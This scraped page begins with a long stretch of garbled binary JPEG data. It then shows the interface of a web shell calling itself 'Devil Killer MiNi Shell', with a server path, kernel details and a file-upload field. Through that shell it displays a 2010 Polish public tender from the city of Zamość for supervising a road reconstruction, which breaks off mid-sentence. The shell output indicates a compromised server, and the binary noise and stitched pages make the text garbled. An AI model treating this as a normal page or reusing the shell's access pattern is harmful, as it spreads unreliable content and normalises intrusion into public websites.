JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100826/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100826/231671-N-2010.html

<p class="kh_header"><b>Zamość: PEŁNIENIE NADZORU INWESTORSKIEGO NAD REALIZACJĄ PROJEKTU: PRZEBUDOWA ULIC: LEGIONÓW (DK 17, 74), AL.JANA PAWŁA II (DK 17) I ULICY HRUBIESZOWSKIEJ (DK 74) 
W ZAMOŚCIU.</b><br>
<b>Numer ogłoszenia: 231671 - 2010; data zamieszczenia: 26.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Zamość , Rynek Wielki 13, 22-400 Zamość, woj. lubelskie, tel. 084 6392084, faks 084 6393054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamosc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PEŁNIENIE NADZORU INWESTORSKIEGO NAD REALIZACJĄ PROJEKTU: PRZEBUDOWA ULIC: LEGIONÓW (DK 17, 74), AL.JANA PAWŁA II (DK 17) I ULICY HRUBIESZOWSKIEJ (DK 74) 
W ZAMOŚCIU..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie Nadzoru Inwestorskiego nad realizacją Projektu: Przebudowa ulic: Legionów (DK 17, 74), Al. Jana Pawła II (DK 17) 
i Hrubieszowskiej (DK 74) w Zamościu.
Zakres planowanej inwestycji obejmuje gruntowną przebudowę ulic i skrzyżowań 
w ciągu tej trasy, a także budowę i przebudowę infrastruktury towarzyszącej. 

Lokalizacja:
Miasto Zamość, ulice: Legionów (DK 17, 74), Al. Jana Pawła II (DK 17) i Hrubieszowska (DK 74).

Zakres robót budowlanych, nad którymi pełniony będzie Nadzór Inwestorski obejmuje wykonanie następujących robót:

1)	przebudowa ul. Legionów (DK 17, 74) w Zamościu na odcinku od ul. Starowiejskiej do skrzyżowania z ulicami: Wyszyńskiego, Hrubieszowską i al. Jana Pawła II:
a)	przebudowa jednojezdniowej ulicy Legionów na odcinku od km 3+818,28 (początek opracowania) do skrzyżowania z ul. Zamoyskiego,
b)	rozbudowa ulicy Legionów na odcinku od skrzyżowania 
z ul. Zamoyskiego do skrzyżowania z ul. Wyszyńskiego, Hrubieszowską i al. Jana Pawła II polegająca na wykonaniu drugiej jezdni o dwóch pasach ruchu,
c)	budowa ciągu pieszo-rowerowego po prawej stronie jezdni na odcinku od km 3+818,28 (początek opracowania) do skrzyżowania z ul. Zamoyskiego,
d)	budowa ciągu pieszo-rowerowego po obu stronach jezdni na odcinku od skrzyżowania z ul. Zamoyskiego do skrzyżowania z ul. Wyszyńskiego, Hrubieszowską i al. Jana Pawła II,
e)	przebudowa skrzyżowania ul. Legionów z ul. Jana Kilińskiego,
f)	przebudowa skrzyżowania ul. Legionów z ul. Zamoyskiego na skrzyżowanie skanalizowane typu rondo,
g)	przebudowa skrzyżowania ul. Legionów z ul. Wyszyńskiego, Hrubieszowską 
i al. Jana Pawła II na skrzyżowanie skanalizowane typu rondo wraz z przebudową odcinka ulicy Wyszyńskiego wynikającą z konieczności zmiany włączenia tej ulicy do skrzyżowania,
h)	przebudowa i budowa zjazdów.
Zakres obejmuje wykonanie  robót w branżach :
-drogowa,
-sanitarna (przebudowa sieci sanitarnych),
-elektryczna (przebudowa i budowa oświetlenia, przebudowa kolizji sieci energetycznych), 
-teleinformatyczna (budowa rurociągów ze studniami kablowymi),
-inżynieria ruchu (oznakowanie poziome i pionowe, drogowa sygnalizacja świetlna),
-zieleń (nasadzenia).
Długość: 
-jezdnia prawa od km 3+818,28 do km 5+448,63 - dł. 1 630,35m,
-jezdnia lewa od km 3+818,28 do km 5+451,94 - dł. 1 633,66 m.
2)	przebudowa ul. Hrubieszowskiej (DK 74) w Zamościu na odcinku od skrzyżowania 
z ul. Legionów do Kalinowic (granica miasta):
a)	przebudowa dwujezdniowej ulicy Hrubieszowskiej na odcinku od skrzyżowania 
z ulicami: Legionów, Wyszyńskiego i al. Jana Pawła II do granicy miasta,
b)	budowa w sąsiedztwie skrzyżowania drogi dojazdowej do przyległych nieruchomości,
c)	budowa ciągu pieszo-rowerowego po obu stronach przebudowywanych jezdni,
d)	budowa zatok autobusowych, 
e)	przebudowa i budowa zjazdów. 
Zakres obejmuje wykonanie robót w branżach: 
-drogowa,
-sanitarna (przebudowa sieci sanitarnych),
-elektryczna (przebudowa i budowa oświetlenia),
-teleinformatyczna (budowa rurociągów ze studniami kablowymi),
-inżynieria ruchu (oznakowanie poziome i pionowe),
-zieleń (nasadzenia).
Długość:
-jezdnia prawa od km 0+000,00 do km 0+973,25,
-jezdnia lewa od km 0+000,00 do km 0+971,85. 
3)	przebudowa alei Jana Pawła II(DK 17) w Zamościu:
a)	przebudowa dwujezdniowej al. Jana Pawła II na odcinku od skrzyżowania z ulicą Hrubieszowską do skrzyżowania z ulicą Lwowską,
b)	budowa ciągu pieszo-rowerowego po obu stronach przebudowywanych jezdni,
c)	budowa zatok autobusowych, 
d)	przebudowa i budowa zjazdów. 
Zakres obejmuje wykonanie robót w branżach: 
-drogowa,
-sanitarna (przebudowa sieci sanitarnych),
-elektryczna (przebudowa kolizji energetycznych),
-teleinformatyczna (budowa rurociągów ze studniami kablowymi),
-inżynieria ruchu (oznakowanie poziome i pionowe, drogowa sygnalizacja świetlna),
-zieleń (nasadzenia).
Długość: 
-jezdnia prawa od km 0+000,00 do km 1+015,33,
-jezdnia lewa od km 0+000,00 do km 1+029,54.
Nazwa przedmiotu zamówienia została wskazana na wstępie opisu przedmiotu zamówienia. Wykonawca usługi pełnić będzie Nadzór Inwestorski  dla inwestycji finansowanej w części ze środków własnych Zamawiającego oraz w części współfinansowanej w ramach Programu Operacyjnego Infrastruktura i Środowisko Priorytet VI : Drogowa i lotnicza sieć TEN-T. Działanie 6.1  Rozwój sieci drogowej TEN-T.

3.1.	Zakres usługi obejmuje:
1)	sprawdzenie i aktualizację dokumentacji budowlanej dostarczonej przez Zamawiającego, sporządzonej zgodnie z rozporządzeniem Ministra Infrastruktury 
z dnia 03 lipca 2003 w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. Nr 120 poz. 1133 z późn. zm. ; Dz.U. z 2008 r. Nr 201, poz. 1239) oraz aktualizację kosztorysów inwestorskich.
2)	kierowanie i koordynacja realizacji kontraktu w przedmiocie wykonania robót budowlanych (inwestycji) celem zapewnienia terminowego i prawidłowego zakończenia robót zgodnie z harmonogramami określonymi w stosownych dokumentacjach technicznych oraz przepisami i zasadami prawa polskiego i Unii Europejskiej, a także udzielanymi na ich podstawie wytycznymi, w szczególności dotyczącymi procedur i standardów realizacji inwestycji, współfinansowanych środkami UE. Do obowiązków pełniącego Nadzór Inwestorski  należy w tym zakresie 
w szczególności: 	sporządzanie i przechowywanie dokumentacji kontraktowej, prowadzenie rejestru robót, aprobowanie harmonogramu rzeczowo-finansowego realizacji inwestycji, aprobowanie płatności, aprobowanie dodatkowych żądań Wykonawcy;
3)	opracowanie pełnej dokumentacji przetargowej dotyczącej wyboru Wykonawcy robót budowlanych, w tym w szczególności: specyfikacji istotnych warunków zamówienia 
i projektu umowy, zaplanowanie pracy Wykonawcy robót drogowych w sezonie budowlanym, w systemie 3 zmianowym, ewentualna modyfikacja dokumentacji już posiadanej przez Zamawiającego (przedmiary robót, kosztorysy, specyfikacje techniczne wykonania i odbioru robót budowlanych,) w celu przeprowadzenia przetargu na wybór Wykonawcy robót oraz jej ewentualnych modyfikacji, wyjaśnień 
i korespondencji, a także innych pism, których konieczność sporządzenia pojawi się 
w trakcie przebiegu procedury udzielania zamówienia publicznego, aż do jej ostatecznego zakończenia. 
4)	uczestnictwo w pracach komisji przetargowej w charakterze członka komisji przy wyborze Wykonawcy robót oraz złożenie oświadczenia, o którym mowa w art. 17 ust. 2 Pzp;
5)	przygotowanie dokumentacji do ewentualnego postępowania przed Krajową Izbą Odwoławczą lub skargi do Sądu Okręgowego oraz udział w postępowaniu odwoławczym lub skargowym; 
6)	dostarczenie Wykonawcy robót dokumentacji niezbędnej do wykonania inwestycji (robót budowlanych) zgodnie z przepisami prawa, złożonymi ofertami i podpisaną 
z Wykonawcą umową  o roboty budowlane; na dokumentację tę składać się będą:
-dokumentacja budowlana robót (a w tym opracowane na zlecenie Zamawiającego projekty budowlano - Wykonawcze), 
-wymagana przepisami prawa niezbędna dokumentacja umożliwiająca realizację robót dodatkowych w rozumieniu art. 67 ust. 1 pkt 5 Pzp; Pełniący Nadzór Inwestorski  zobowiązany jest zgłosić konieczność wykonania tych robót 
i przedstawić zgodne z przepisami prawa uzasadnienie, a po uzyskaniu akceptacji Zamawiającego, dokonać uzgodnień z autorem projektu w zakresie wykonania dokumentacji zamiennej lub konieczności wykonania niezbędnej dokumentacji 
i pokryć koszty tych usług (w tym wykonania, praw autorskich, wizyt projektanta na budowie, uzgodnień, itp.),
-wymagana przepisami prawa i niezbędna dokumentacja umożliwiająca wprowadzanie i realizację rozwiązań zamiennych w rozumieniu art. 20 ust. 1 pkt 4b) Prawa budowlanego (uzgadniania możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego), w tym także 
w zakresie zastosowania materiałów zamiennych. Pełniący Nadzór Inwestorski zobowiązany jest zgłosić konieczność wykonania tych robót i przedstawić zgodne z przepisami prawa uzasadnienie, a po uzyskaniu akceptacji Zamawiającego, dokonać uzgodnień z autorem projektu w zakresie wykonania dokumentacji zamiennej lub konieczności wykonania niezbędnej dokumentacji i pokryć koszty tych usług (w tym wykonania, praw autorskich, wizyt projektanta na budowie, uzgodnień, itp.),
7)	zapewnienie codziennego nadzoru inwestorskiego nad realizacją inwestycji, 
a w szczególności wizytowanie budowy, monitorowanie realizacji kontraktu, sprawdzanie obmiarów, nadzorowanie i odbiór robót, zagwarantowanie stałego nadzoru inspektorów nadzoru, w tym ich codziennej dyspozycyjności, nadzoru na placu budowy. Pełniący Nadzór Inwestorski zobowiązany jest zapewnić siłami 
i środkami własnymi obecność inspektorów nadzoru na budowie w odpowiednim czasie dla prawidłowej realizacji robót budowlanych. Pełniący Nadzór Inwestorski ponosi odpowiedzialność za wszelkie opóźnienia, nieprawidłowości lub wady, do których przyczynił się, w szczególności poprzez brak zapewnienia wymaganego przepisami prawa lub umową nadzoru
8)	wykonywanie stosownie do przepisów prawa budowanego zadań:
-Inspektora Nadzoru Inwestorskiego (art. 25, 26 Prawa Budowlanego),
-Koordynatora Czynności Nadzoru Inwestycyjnego (art. 27 Prawa Budowlanego),
-Inwestora Zastępczego (art. 18 Prawa Budowlanego).
9)	rozwiązywanie wszelkich problemów i sporów związanych z realizacją robót, 
w szczególności w zakresie akceptacji zamiennych rozwiązań i materiałów, wad dokumentacji inwestycji w tym projektowej, rozliczaniem kontraktu, sporządzaniem dokumentacji powykonawczej, itp.; 
10)	prowadzenie procedur finansowych łącznie ze sprawozdawczością, w tym wystawianie poleceń płatności z uwzględnieniem ewentualnych podwykonawców robót budowlanych. Pełnienie Nadzoru Inwestorskiego zobowiązany będzie do zapewnienia skutecznej procedury rozliczania płatności Wykonawcy robót 
z podwykonawcami oraz zapewni, że płatności na rzecz Wykonawcy robót dokonywane będą po opłaceniu przez Wykonawcę robót należności podwykonawcom, zgodnie z zasadami programu TEN-T;
11)	opracowanie kompletnego wniosku o płatność łącznie z załącznikami do przedłożenia do Ministerstwa Infrastruktury;
12)	przedstawianie opinii Zamawiającemu i aprobata dokumentów zawierających wnioski Wykonawcy robót, co do sposobu lub harmonogramu realizacji robót, w tym 
w zakresie wydłużenia czasu trwania umowy o wykonanie robót budowlanych, po uzyskaniu zgody Zamawiającego i wprowadzeniu ich przez Zamawiającego do umowy zgodnie z art. 144 Pzp;
13)	informowanie na piśmie odpowiedzialnych za realizację robót budowlanych (inwestycji) przedstawicieli Zamawiającego o wszelkich faktach mających znaczenie dla realizacji inwestycji, a zwłaszcza o wszelkich zagrożeniach terminu zakończenia robót w sposób i w czasie umożliwiającym podjęcie adekwatnych działań przez Zamawiającego;
14)	udostępnianie Zamawiającemu, na każde pisemne żądanie, wszelkich dokumentów związanych z realizacją umowy; 
15)	sporządzanie miesięcznych i okresowych sprawozdań z przebiegu realizacji inwestycji, ze szczególnym uwzględnieniem ewentualnych zagrożeń w terminowości realizacji inwestycji oraz wątpliwości w zakresie zgodności z przepisami prawa, wytycznymi, zasadami sztuki budowlanej i przedstawianie ich Zamawiającemu, 
w terminach wzajemnie uzgodnionych i umożliwiających podejmowanie stosownych działań zaradczych;
16)	regularne sporządzanie dokumentacji fotograficznej realizowanego Projektu, w tym robót zanikowych, stanu terenu i obiektów objętych projektem przed rozpoczęciem, 
w trakcie trwania oraz po zakończeniu realizacji projektu; dokumentacja fotograficzna powinna zostać wykonana w wysokiej rozdzielczości umożliwiającej publikację;
17)	przeniesienia na Zamawiającego w ramach ustalonego wynagrodzenia, autorskich praw majątkowych do dokumentacji fotograficznej związanej z realizacją projektu;
18)	kontrolowanie przestrzegania przez Wykonawcę robót zasad bezpieczeństwa i higieny pracy, przepisów p.poż. i utrzymania porządku na terenie umowy;
19)	organizowanie i przewodniczenie radom budowy, naradom technicznym, i innym spotkaniom, w których, w zależności od potrzeb, udział biorą przedstawiciele wszystkich zaangażowanych w realizację Projektu stron w terminach wynikających 
z potrzeb, lecz nie rzadziej niż raz w miesiącu oraz sporządzania protokołów z tych narad i przekazywania ich Zamawiającemu w terminie 5 dni od dnia narady;
20)	obsługa okresu gwarancji i rękojmi z tytułu wykonania Inwestycji. Pełniący Nadzór Inwestorski zobowiązany będzie do:
-prowadzenia przy udziale przedstawicieli Zamawiającego przeglądów gwarancyjnych. Zamawiający zakłada, że w okresie gwarancyjnym przynajmniej raz na pół roku dokonywane będą przeglądy stanu technicznego wybudowanych 
i przebudowanych obiektów i instalacji. W przypadku stwierdzenia usterek/wad objętych gwarancją lub rękojmią pełniący Nadzór Inwestorski zobowiązany będzie do wyegzekwowania ich naprawy przez Wykonawcę robót. W ramach prowadzenia przeglądów gwarancyjnych pełniący Nadzór Inwestorski zobowiązany jest do opracowania harmonogramu przeglądów, organizowanie przeglądów raz na pół roku, przygotowanie dokumentacji po przeglądzie, kierowanie pism do Wykonawcy o usunięcie usterek jeśli będzie taka potrzeba - obsługa poodbiorowa do terminów wygaśnięcia gwarancji i rękojmi i dokonania odbiorów pogwarancyjnych;
-prowadzenia na rzecz Zamawiającego korespondencji postępowania wyjaśniającego (sporządzanie wyjaśnień, odwołań, informacji itp.), w sytuacji, gdy organy kontrolne stwierdzą, że dokumentacja przetargowa na wybór Wykonawcy, za przygotowanie której odpowiedzialny będzie pełniący Nadzór Inwestorski, została sporządzona niewłaściwie, pomimo działań pełniącego Nadzór Inwestorski - w sytuacji, gdyby Zamawiający zmuszony by był do zwrotu części lub całości dotacji na skutek przyczyn leżących po stronie pełniącego Nadzór Inwestorski;
21)	sporządzenie uzgodnionych z Zamawiającym dowodów odbioru technicznego (OT) 
i przekazywanie tych dokumentów Zamawiającemu wraz z oświadczeniem 
o usunięciu przez Wykonawcę robót ewentualnych usterek stwierdzonych przy odbiorze - w terminie dwóch miesięcy od daty przekazania Zamawiającemu protokołu odbioru końcowego;
22)	sporządzanie i przedkładanie dokumentacji z powtórnego użycia, recyklingu, przetwarzania lub składowania w sposób przyjazny dla środowiska naturalnego zbędnych lub pozostałych materiałów z prac budowlanych.
23)	przygotowanie, wraz z niezbędnymi załącznikami, wniosku niezbędnego do uzyskania decyzji - pozwolenia na użytkowanie obiektów, które zostaną wybudowane lub przebudowane w wyniku realizacji Projektu.
3.2.	Nadzór inwestorski obejmuje nadzór nad robotami  w branżach: drogowej, sanitarnej, elektrycznej, telekomunikacyjnej. Na żądanie i z upoważnienia Zamawiającego lub właściwego organu, zapewnienie nadzoru autorskiego, 
w sytuacjach określonych art. 20 ust. 1 pkt 4 Prawa budowlanego. Na każdym etapie prac pełniący Nadzór Inwestorski jest zobowiązany do informowania Zamawiającego 
o wszelkich propozycjach zmian projektu.
3.3.	Niezależnie od zakresu określonego w pkt 3.1. zakres usług stanowiących przedmiot zamówienia obejmuje także wszelkie czynności związane z obsługą przed realizacją budowy (sprawdzenie dokumentacji budowlanej i specyfikacji technicznej wykonania i odbioru robót, przekazanie placu budowy), obsługa podczas budowy, obsługa poodbiorowa do terminów wygaśnięcia rękojmi, gwarancji i odbiorów pogwarancyjnych. Ma to na celu spowodowanie, aby całość nadzorowanych robót (inwestycji) była wykonana w szczególności zgodnie z:
1)	Projektami budowlanymi i wykonawczymi,
2)	Warunkami określonymi w pozwoleniach na budowę i rozbiórkę oraz zgłoszeniami robót nie wymagającymi pozwolenia na budowę . Wnioskowane przedsięwzięcie posiada, oddzielnie dla każdego zadania pozwolenia na budowę :
-decyzja nr 78/07 z dnia 23.05.2007 r. zatwierdzająca projekt budowlany wraz 
z udzieleniem pozwolenia na wykonanie robót budowlanych dla przedsięwzięcia polegającego na przebudowie ulicy Legionów w Zamościu na odcinku od 
ul. Starowiejskiej do ul. Al. Jana Pawła II wraz z przebudową ronda 
i skrzyżowania ulic Legionów - Wyszyńskiego - Hrubieszowska - Jana Pawła II oraz budowę ciągu pieszo - rowerowego po stronie wschodniej i ewentualną przebudowę sieci uzbrojenia miejskiego.
-decyzja nr 79/07 z dnia 23.05.2007 r. zatwierdzająca projekt budowlany wraz 
z udzieleniem pozwolenia na wykonanie robót budowlanych dla przedsięwzięcia polegającego na przebudowie ulicy Hrubieszowskiej w Zamościu na odcinku od Kalinowic do ul. Legionów wraz z budową obustronnych ciągów pieszo - rowerowych oraz ewentualną przebudową kolizji sieci uzbrojenia miejskiego.
-decyzja nr 80/07 z dnia 23.05.2007 r. zatwierdzająca projekt budowlany wraz 
z udzieleniem pozwolenia na wykonanie robót budowlanych dla przedsięwzięcia polegającego na przebudowie ulicy Jana Pawła II w Zamościu na odcinku od 
ul. Hrubieszowskiej do ul. Lwowskiej oraz budowie ciągów pieszo - rowerowych i przebudową kolizji sieci uzbrojenia miejskiego.
-decyzja nr 280/06 z dnia 21.09.2006 r. zatwierdzająca projekt budowlany wraz 
z udzieleniem pozwolenia na wykonanie robót budowlanych dla przedsięwzięcia polegającego na budowie oświetlenia ulicznego w ciągu drogi krajowej 17 przy ul. al. Jana Pawła II z Zamościu, odc. ul. Lwowska - rondo przy 
ul. Wyszyńskiego.
3)	Wymaganiami materiałowo - technicznymi określonymi w szczegółowych specyfikacjach technicznych wykonania i odbioru robót,
4)	Przedmiarami robót, 
5)	Kosztorysami ofertowymi.

3.4.	Zamawiający dostarczy pełniącemu Nadzór Inwestorski dokumentację techniczną (projekty budowlane i wykonawcze z przedmiarami robót, kosztorysami ślepymi 
i kosztorysami inwestorskimi - do aktualizacji wraz z uzgodnieniami, pozwoleniami na budowę i rozbiórkę oraz dziennikami budowy/rozbiórki).
3.5.	Szacunkowa wartość zamówienia /zadania/ wynosi: 21 040 340,30 zł netto (słownie: dwadzieścia jeden milionów czterdzieści tysięcy trzysta czterdzieści 30/100 złotych). Uwaga: Ze względu na określone Pzp zasady udzielenia zamówień publicznych, zobowiązuje się Wykonawców do zachowania poufności materiałów otrzymanych do przetargu w stosunku do zainteresowanych przyszłym przetargiem na roboty budowlane związanych z przedmiotową inwestycją..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4, 71.54.10.00-2, 71.54.00.00-5, 71.24.70.00-1, 71.31.00.00-4, 79.42.10.00-1, 79.93.30.00-3, 71.24.20.00-6, 71.24.50.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie wadium w wysokości: 20 000,00zł, (słownie: dwadzieścia tysięcy złotych), Wadium może być wnoszone w jednej lub kilku formach wyszczególnionych w art. 45 ust. 6 Ustawy Prawo zamówień publicznych</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Stawia się warunek posiadania wiedzy i doświadczenia
 w zakresie wykonania w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - usług dotyczących pełnienia Nadzoru Inwestorskiego 
w zakresie nadzoru nad inwestycjami budowlanymi (co najmniej 1 podobna do przedmiotu zamówienia o wartości robót budowlanych nie mniejszej niż 6 mln zł). Przez podobną inwestycję należy rozumieć wykonanie przebudowy/ budowy drogi klasy drogi co najmniej G o długości nie mniejszej niż 1 km.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Stawia się warunek dysponowania osobami zdolnymi do wykonywania zamówienia:
-Inspektor Wiodący (kierownik zespołu Inspektorów Nadzoru Inwestorskiego),
-Inspektor nadzoru robót drogowych,
-Inspektor nadzoru robót sanitarnych,
-Inspektor nadzoru robót elektrycznych,
-Inspektor nadzoru robót telekomunikacyjnych,
-Inspektor ds. rozliczeń,
-Inspektor ds. zamówień publicznych.

Inspektor Wiodący (kierownik zespołu Inspektorów Nadzoru Inwestorskiego) winien posiadać uprawnienia budowlane w specjalności drogowej bez ograniczeń, zgodnie 
z ustawą z dnia 07 lipca 1994r Prawo Budowlane (tekst jedn.: Dz. U. 
z 2006 r. Nr 156 poz. 1118 z późn. zm.) oraz rozporządzeniem Ministra Transportu 
i Budownictwa z dn. 28.04.2006r. w sprawie samodzielnych funkcji technicznych 
